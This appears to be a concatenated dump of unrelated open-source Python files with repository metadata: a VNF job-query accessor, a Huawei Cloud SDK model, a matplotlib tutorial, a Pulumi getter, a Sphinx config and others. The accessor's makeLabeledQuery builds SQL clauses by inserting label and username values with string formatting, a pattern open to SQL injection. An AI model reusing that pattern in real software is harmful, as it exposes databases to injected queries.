q = self.makeQuery(filter=filter, label=label, mine=mine)
return q.alias('tocount').count().execute().fetchone()[0]
def getJobIDs(
self,
filter=None, order_by=None, reverse_order=None, slice=None,
label=None, mine=False,
):
db = self.db
q = self.makeQuery(filter=filter, label=label, mine=mine)
if order_by:
q = q.order_by(order_by)
if slice:
if reverse_order:
n = self.countJobs(filter=filter, label=label, mine=mine)
slice = n-slice[1], n-slice[0]
q = sqlalchemy.select(
[q.alias('toslice')],
limit = slice[1]-slice[0],
offset = slice[0])
ret = q.execute().fetchall()
if reverse_order:
ret.reverse()
return [i.id for i in ret]
def getJobRecords(
self,
filter=None, order_by=None, reverse_order=None, slice=None,
label=None, mine=False,
):
ids = self.getJobIDs(
filter=filter, order_by=order_by, reverse_order=reverse_order, slice=slice,
label=label, mine=mine,
)
return map(self.getJobRecord, ids)
def makeQuery(self, filter=None, label=None, mine=False):
if label:
if filter: raise RuntimeError
return self.makeLabeledQuery(label, mine=mine)
db = self.db
st = db._tablemap.TableToSATable(JobTable)
cols = [
st.c.id.label('id'),
st.c.short_description.label('short_description'),
st.c.state.label('state'),
st.c.time_start.label('time_start'),
st.c.creator,
st.c.globalpointer,
]
username = self.director.sentry.username
if mine:
where = st.c.creator == username
q = sqlalchemy.select(cols, where)
else:
from vnf.utils.query.accesscontrol import select_public_or_owned_records
q = select_public_or_owned_records(cols, st, username, db)
if filter:
q = sqlalchemy.select([q.alias('jobs')], whereclause=filter)
return q
def makeLabeledQuery(self, label, mine=False):
mastertablename = 'job'
db = self.db
sL = db._tablemap.TableToSATable(Label)
if label in common_labels:
whereclause="labelname='%s'" % (label,)
else:
whereclause="labelname='%s' and targettable='%s'" % (
label, mastertablename)
labelq = sqlalchemy.select(
[sL.c.entity.label('entity'),
sL.c.labelname.label('label'),
],
whereclause=whereclause,
).alias('labelq')
st = db._tablemap.TableToSATable(JobTable)
cols = [
st.c.id.label('id'),
st.c.short_description.label('short_description'),
st.c.state.label('state'),
st.c.time_start.label('time_start'),
labelq.c.entity.label('gptr'),
]
# where = st.c.globalpointer==labelq.c.entity
where = 'globalpointer=labelq.entity'
if mine:
username = self.director.sentry.username
mine = "creator='%s'" % username
where = '%s and %s' % (where, mine)
q = sqlalchemy.select(cols, whereclause = where)
return q
from vnf.dom.Label import Label, common_labels
from vnf.dom.Job import Job as JobTable
from dsaw.db.VersatileReference import global_pointer
import sqlalchemy
def accessor():
return Accessor()
# version
__id__ = "$Id$"
# End of file
| [
"linjiao@caltech.edu"
] | linjiao@caltech.edu |
8885c933ea131e903feb51fe6f4dbc4537a88af7 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/qos_send_receive_info.py | 7b4a4548e2c3a10bc21c875febcbe1d7b61af84f | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,634 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class QosSendReceiveInfo:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'bitrate': 'list[QosDataNoThrElement]',
'latency': 'list[QosDataElement]',
'jitter': 'list[QosDataElement]',
'packet_loss_max': 'list[QosDataElement]',
'resolution': 'list[QosDataNoThrElement]',
'frame': 'list[QosDataNoThrElement]'
}
attribute_map = {
'bitrate': 'bitrate',
'latency': 'latency',
'jitter': 'jitter',
'packet_loss_max': 'packet_loss_max',
'resolution': 'resolution',
'frame': 'frame'
}
def __init__(self, bitrate=None, latency=None, jitter=None, packet_loss_max=None, resolution=None, frame=None):
"""QosSendReceiveInfo - a model defined in huaweicloud sdk"""
self._bitrate = None
self._latency = None
self._jitter = None
self._packet_loss_max = None
self._resolution = None
self._frame = None
self.discriminator = None
if bitrate is not None:
self.bitrate = bitrate
if latency is not None:
self.latency = latency
if jitter is not None:
self.jitter = jitter
if packet_loss_max is not None:
self.packet_loss_max = packet_loss_max
if resolution is not None:
self.resolution = resolution
if frame is not None:
self.frame = frame
@property
def bitrate(self):
"""Gets the bitrate of this QosSendReceiveInfo.
码率, 单位kbps,不含阈值告警。当qosType = audio/video/screen 时有效。
:return: The bitrate of this QosSendReceiveInfo.
:rtype: list[QosDataNoThrElement]
"""
return self._bitrate
@bitrate.setter
def bitrate(self, bitrate):
"""Sets the bitrate of this QosSendReceiveInfo.
码率, 单位kbps,不含阈值告警。当qosType = audio/video/screen 时有效。
:param bitrate: The bitrate of this QosSendReceiveInfo.
:type: list[QosDataNoThrElement]
"""
self._bitrate = bitrate
@property
def latency(self):
"""Gets the latency of this QosSendReceiveInfo.
时延,单位毫秒, 含阈值告警。当qosType = audio/video/screen 时有效。
:return: The latency of this QosSendReceiveInfo.
:rtype: list[QosDataElement]
"""
return self._latency
@latency.setter
def latency(self, latency):
"""Sets the latency of this QosSendReceiveInfo.
时延,单位毫秒, 含阈值告警。当qosType = audio/video/screen 时有效。
:param latency: The latency of this QosSendReceiveInfo.
:type: list[QosDataElement]
"""
self._latency = latency
@property
def jitter(self):
"""Gets the jitter of this QosSendReceiveInfo.
抖动, 单位毫秒,含阈值告警。当qosType = audio/video/screen 时有效。
:return: The jitter of this QosSendReceiveInfo.
:rtype: list[QosDataElement]
"""
return self._jitter
@jitter.setter
def jitter(self, jitter):
"""Sets the jitter of this QosSendReceiveInfo.
抖动, 单位毫秒,含阈值告警。当qosType = audio/video/screen 时有效。
:param jitter: The jitter of this QosSendReceiveInfo.
:type: list[QosDataElement]
"""
self._jitter = jitter
@property
def packet_loss_max(self):
"""Gets the packet_loss_max of this QosSendReceiveInfo.
最大丢包率, 单位百分比 含阈值告警。当qosType = audio/video/screen 时有效。
:return: The packet_loss_max of this QosSendReceiveInfo.
:rtype: list[QosDataElement]
"""
return self._packet_loss_max
@packet_loss_max.setter
def packet_loss_max(self, packet_loss_max):
"""Sets the packet_loss_max of this QosSendReceiveInfo.
最大丢包率, 单位百分比 含阈值告警。当qosType = audio/video/screen 时有效。
:param packet_loss_max: The packet_loss_max of this QosSendReceiveInfo.
:type: list[QosDataElement]
"""
self._packet_loss_max = packet_loss_max
@property
def resolution(self):
"""Gets the resolution of this QosSendReceiveInfo.
分辨率, 不含阈值告警。当qosType = video/screen 时有效。
:return: The resolution of this QosSendReceiveInfo.
:rtype: list[QosDataNoThrElement]
"""
return self._resolution
@resolution.setter
def resolution(self, resolution):
"""Sets the resolution of this QosSendReceiveInfo.
分辨率, 不含阈值告警。当qosType = video/screen 时有效。
:param resolution: The resolution of this QosSendReceiveInfo.
:type: list[QosDataNoThrElement]
"""
self._resolution = resolution
@property
def frame(self):
"""Gets the frame of this QosSendReceiveInfo.
帧率, 单位fps,不含阈值告警。当qosType = video/screen 时有效。
:return: The frame of this QosSendReceiveInfo.
:rtype: list[QosDataNoThrElement]
"""
return self._frame
@frame.setter
def frame(self, frame):
"""Sets the frame of this QosSendReceiveInfo.
帧率, 单位fps,不含阈值告警。当qosType = video/screen 时有效。
:param frame: The frame of this QosSendReceiveInfo.
:type: list[QosDataNoThrElement]
"""
self._frame = frame
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QosSendReceiveInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
db126458e075c35c3a9606d6dc1f54e18b85536e | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /src/python/WMCore/RequestManager/RequestDB/Oracle/Group/GetGroupFromAssoc.py | 3549961c0b5eea9816bb43e00f98608494e976f0 | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from WMCore.RequestManager.RequestDB.MySQL.Group.GetGroupFromAssoc import GetGroupFromAssoc as GetGroupFromAssocMySQL
class GetGroupFromAssoc(GetGroupFromAssocMySQL):
pass | [
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
dfcf388075f9499cfdaf3e385b9bec1af4308eb3 | 3aef4825c5f2366f2e551cdfa54b88c034b0b4f4 | /tutorials/2_tensorflow_old/matplotlibTUT/plt14_3d.py | d742a0cd4768afe2bb32c874c3cc31368aaf5fd1 | [
"MIT"
] | permissive | wull566/tensorflow_demo | 4a65cbe1bdda7430ab1c3883889501a62258d8a6 | c2c45050867cb056b8193eb53466d26b80b0ec13 | refs/heads/master | 2020-04-06T17:34:05.912164 | 2018-11-15T07:41:47 | 2018-11-15T07:41:48 | 157,665,187 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,233 | py | # View more 3_python 2_tensorflow_old on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 14 - 3d
"""
Please note, this script is for python3+.
If you are using python2+, please modify it accordingly.
Tutorial reference:
http://www.3_python-course.eu/matplotlib_multiple_figures.php
"""
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = Axes3D(fig)
# X, Y value
X = np.arange(-4, 4, 0.25)
Y = np.arange(-4, 4, 0.25)
X, Y = np.meshgrid(X, Y)
R = np.sqrt(X ** 2 + Y ** 2)
# height value
Z = np.sin(R)
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
"""
============= ================================================
Argument Description
============= ================================================
*X*, *Y*, *Z* Data values as 2D arrays
*rstride* Array row stride (step size), defaults to 10
*cstride* Array column stride (step size), defaults to 10
*color* Color of the surface patches
*cmap* A colormap for the surface patches.
*facecolors* Face colors for the individual patches
*norm* An instance of Normalize to map values to colors
*vmin* Minimum value to map
*vmax* Maximum value to map
*shade* Whether to shade the facecolors
============= ================================================
"""
# I think this is different from plt12_contours
ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=plt.get_cmap('rainbow'))
"""
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the filled contour
on this position in plane normal to zdir
========== ================================================
"""
ax.set_zlim(-2, 2)
plt.show()
| [
"vicleo566@163.com"
] | vicleo566@163.com |
09948ecbf8dce75fc191482b02c52f34414e2dd2 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/AGC/agc037/agc037_a.py | 0a81674be640dbd4e2a9a68795fce2f0fa83a027 | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 205 | py | s = str(input())
count = 1
pre = s[0]
now = ""
for i in range(1, len(s)):
now += s[i]
if pre == now:
continue
else:
count += 1
pre = now
now = ""
print(count)
| [
"reohirao116@gmail.com"
] | reohirao116@gmail.com |
3948a716848ac63fa942f4ff68789df1d13eec70 | 342ec51a35eef43fe1bafa31bdf8f0c9ef956cd9 | /comlib.py | 2ef51158ec9e1743618a2ad4d19ab834c1795910 | [
"MIT"
] | permissive | Strangemother/python-simple-tts-stt | a60ff7ce4e4b9dd58a3a906c7a8c266b0dc6bb2a | e7ac38e795b32f55367a58107d86bf04ea906f0c | refs/heads/master | 2020-03-21T10:18:41.407181 | 2019-01-02T07:32:24 | 2019-01-02T07:32:24 | 138,444,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | import speech
import comtypes.client # Importing comtypes.client will make the gen subpackage
import os
try:
assert(os.name == 'nt') # Checks for Windows
except:
raise RuntimeError("Windows is required.")
try:
from comtypes.gen import SpeechLib # comtypes
except ImportError:
# Generate the SpeechLib lib and any associated files
engine = comtypes.client.CreateObject("SAPI.SpVoice")
stream = comtypes.client.CreateObject("SAPI.SpFileStream")
from comtypes.gen import SpeechLib
| [
"jay@strangemother.com"
] | jay@strangemother.com |
5c82f1295336f62ee18d4ca09a43169108808919 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007-EOL/applications/hardware/bluez-utils/actions.py | 998201a4580feb5fd60d2b947e9349576906fa8d | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--enable-all \
--enable-pie \
--disable-initscripts \
--disable-sdpd \
--disable-hidd \
--localstatedir=/var")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
# move bluetooth rules into correct place
pisitools.domove("/etc/udev/bluetooth.rules", "/etc/udev/rules.d", "40-bluetooth.rules")
pisitools.dodoc("AUTHORS", "ChangeLog", "README")
# optional bluetooth utils
pisitools.dobin("daemon/passkey-agent")
pisitools.dobin("daemon/auth-agent")
pisitools.dosbin("tools/hcisecfilter")
pisitools.dosbin("tools/ppporc")
# bluez test
pisitools.dobin("test/hsmicro")
pisitools.dobin("test/hsplay")
pisitools.dobin("test/hstest")
pisitools.dobin("test/attest")
pisitools.dobin("test/apitest")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
07896960fbc3c364f8fa514f19481ea4d06edca5 | ae10b60cb92a69146bfb05ef5dde735a0aa45d4b | /examples/New Functions/Example distance 1.py | 2d8b3d0afa43d6027b21ee429f3c43c74def211d | [
"MIT"
] | permissive | kantel/nodebox-pyobjc | 471cea4c5d7f1c239c490323186458a74edcc214 | 068ba64c87d607522a240ab60c3ba14f869f6222 | refs/heads/master | 2021-08-14T18:32:57.995445 | 2017-11-16T13:42:23 | 2017-11-16T13:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 982 | py | import math
def params(val, name):
global x, y
# global scope needs updating.
val = int(round(val,0))
if name == "x":
x = int(val)
else:
y = int(val)
triangle(x, y)
def triangle(x, y):
x0, y0 = 100, 160
x1, y1 = x0 + x, y0
x2, y2 = x0, y0 + y
# draw a triangle
stroke(0.2)
nofill()
strokewidth(2)
autoclosepath(True)
beginpath(x0, y0)
lineto(x1, y1)
lineto(x2, y2)
endpath()
# labels
fill(0)
lx,ly = x0 + (x/2.0), y0 - 10
text("x", lx, ly)
lx,ly = x0 - 15, y0 + (y / 2.0)
text("y", lx, ly)
lx,ly = x0, y0 -130
text("x = %i" % x, lx, ly)
lx,ly = x0, y0 -100
text("y = %i" % y, lx, ly)
d = round(distance(x1, y1, x2, y2), 4)
lx,ly = x0, y0 -70
text("hypotenuse ≈ %.4f" % d, lx, ly)
var("x", NUMBER, default=50, min=10, max=300, handler=params)
var("y", NUMBER, default=50, min=10, max=300, handler=params)
triangle(x,y)
| [
"karstenwo@web.de"
] | karstenwo@web.de |
9216428587f42a0e67dbf4b9393da0b0e71f9cdc | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/apimanagement/v20201201/get_content_item.py | 839b7064a377f6a60900dac782fc801a0b858684 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 3,523 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetContentItemResult',
'AwaitableGetContentItemResult',
'get_content_item',
]
@pulumi.output_type
class GetContentItemResult:
"""
Content type contract details.
"""
def __init__(__self__, id=None, name=None, properties=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> Any:
"""
Properties of the content item.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type for API Management resource.
"""
return pulumi.get(self, "type")
class AwaitableGetContentItemResult(GetContentItemResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetContentItemResult(
id=self.id,
name=self.name,
properties=self.properties,
type=self.type)
def get_content_item(content_item_id: Optional[str] = None,
content_type_id: Optional[str] = None,
resource_group_name: Optional[str] = None,
service_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetContentItemResult:
"""
Content type contract details.
:param str content_item_id: Content item identifier.
:param str content_type_id: Content type identifier.
:param str resource_group_name: The name of the resource group.
:param str service_name: The name of the API Management service.
"""
__args__ = dict()
__args__['contentItemId'] = content_item_id
__args__['contentTypeId'] = content_type_id
__args__['resourceGroupName'] = resource_group_name
__args__['serviceName'] = service_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:apimanagement/v20201201:getContentItem', __args__, opts=opts, typ=GetContentItemResult).value
return AwaitableGetContentItemResult(
id=__ret__.id,
name=__ret__.name,
properties=__ret__.properties,
type=__ret__.type)
| [
"noreply@github.com"
] | morrell.noreply@github.com |
eaca57fe897b429426f4d1512460c6fe58b9fbd0 | c02ed092ce4fceff7f8b2cb0bdf8712141581e51 | /doc/conf.py | 82230848e00960bd70c7c19859a7b2ad1775d197 | [
"MIT",
"MIT-0"
] | permissive | ronaldoussoren/macholib | 376a953654c69d8c01e763efc0508346d420fa9f | 0f77e700f84690121bba872470bc825cecd23d97 | refs/heads/master | 2023-09-03T16:08:46.378443 | 2022-09-25T17:48:13 | 2022-09-25T17:48:13 | 231,951,689 | 72 | 15 | MIT | 2022-04-25T16:18:57 | 2020-01-05T17:24:17 | Python | UTF-8 | Python | false | false | 8,802 | py | # -*- coding: utf-8 -*-
#
# macholib documentation build configuration file, created by
# sphinx-quickstart on Tue Sep 28 22:23:35 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
def get_version():
fn = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "setup.cfg"
)
for ln in open(fn):
if ln.startswith("version"):
version = ln.split("=")[-1].strip()
return version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.intersphinx"]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix of source filenames.
source_suffix = ".rst"
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "macholib"
copyright = "2010-2011, Ronald Oussoren"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = get_version()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "nature"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = "macholibdoc"
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
("index", "macholib.tex", "macholib Documentation", "Ronald Oussoren", "manual")
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [("index", "macholib", "macholib Documentation", ["Ronald Oussoren"], 1)]
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = "macholib"
epub_author = "Ronald Oussoren"
epub_publisher = "Ronald Oussoren"
epub_copyright = "2010, Ronald Oussoren"
# The language of the text. It defaults to the language option
# or en if the language is not set.
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
# epub_identifier = ''
# A unique identification for the text.
# epub_uid = ''
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_post_files = []
# A list of files that should not be packed into the epub file.
# epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
# epub_tocdepth = 3
# Allow duplicate toc entries.
# epub_tocdup = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("http://docs.python.org/", None),
"altgraph": ("http://packages.python.org/altgraph", None),
}
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
c23e4d616602f79d9d239eacb7e8558f1639d2ff | e59602b7e17fafff70240700138bbe54ced28739 | /PythonSimpleVisualiser.py | 152c3204cf353fff3ddeab2c45ec43bdd5770b29 | [] | no_license | TestSubjector/CompGeometry2 | ddc3dae8517e45d419e7057f2d905ad5d95d67e7 | 3b7f30302c837d883132290789cd84305f0e0b10 | refs/heads/master | 2022-03-27T13:37:46.115463 | 2019-04-03T18:18:48 | 2019-04-03T18:18:48 | 177,393,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,173 | py | ## Takes input from a text file and plots all points.
## Connects the points in order read and connects last point to first one.
import argparse
import matplotlib.pyplot as plt
def getArgParser():
''' Returns ArgParser object to handle command-line args'''
parser = argparse.ArgumentParser()
parser.add_argument("filepath",default="./input.ch",nargs="?",help="path of the input file")
return parser
if __name__ == '__main__':
parser = getArgParser()
args = parser.parse_args()
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
inputfile = open(args.filepath,"r")
storeType = inputfile.readline();
# print(storeType)
numberOfPoints, ch_indices = [int(a) for a in inputfile.readline().split()]
# print(numberOfPoints)
# print(ch_indices)
points = []
for i in range(numberOfPoints):
x,y,z = inputfile.readline().split()
points.append([float(x), float(y)])
if storeType == "CHG\n" or storeType == "CHJ\n":
ch_indices = [element for element in map(int,inputfile.readline().split())]
for point in points:
plt.plot(point[0],point[1],'bo')
for i in range(len(ch_indices)-1):
plt.plot([points[ch_indices[i]][0],points[ch_indices[i+1]][0]],[points[ch_indices[i]][1],points[ch_indices[i+1]][1]],'g-')
plt.plot([points[ch_indices[0]][0],points[ch_indices[len(ch_indices)-1]][0]],[points[ch_indices[0]][1],points[ch_indices[len(ch_indices)-1]][1]],'g-')
plt.show()
if storeType == "CHK\n":
ch_points = [element for element in map(str,inputfile.readline().split())]
ch_indices = []
for item in ch_points:
x,y = item.split(",")
ch_indices.append([float(x), float(y)])
for point in points:
plt.plot(point[0],point[1],'bo')
for i in range(len(ch_indices)-1):
plt.plot([ch_indices[i][0], ch_indices[i+1][0]],[ch_indices[i][1], ch_indices[i+1][1]],'g-')
plt.plot([ch_indices[0][0], ch_indices[len(ch_indices)-1][0]], [ch_indices[0][1], ch_indices[len(ch_indices)-1][1]],'g-')
plt.show()
inputfile.close()
| [
"f2015845@hyderabad.bits-pilani.ac.in"
] | f2015845@hyderabad.bits-pilani.ac.in |
95621f79a92dc69d3ca8f9ac1482bf81b28cb8fa | 9cd180fc7594eb018c41f0bf0b54548741fd33ba | /sdk/python/pulumi_azure_nextgen/web/v20181101/get_web_app_function.py | f035db040d58335774ba7aec281ac9825034db4b | [
"Apache-2.0",
"BSD-3-Clause"
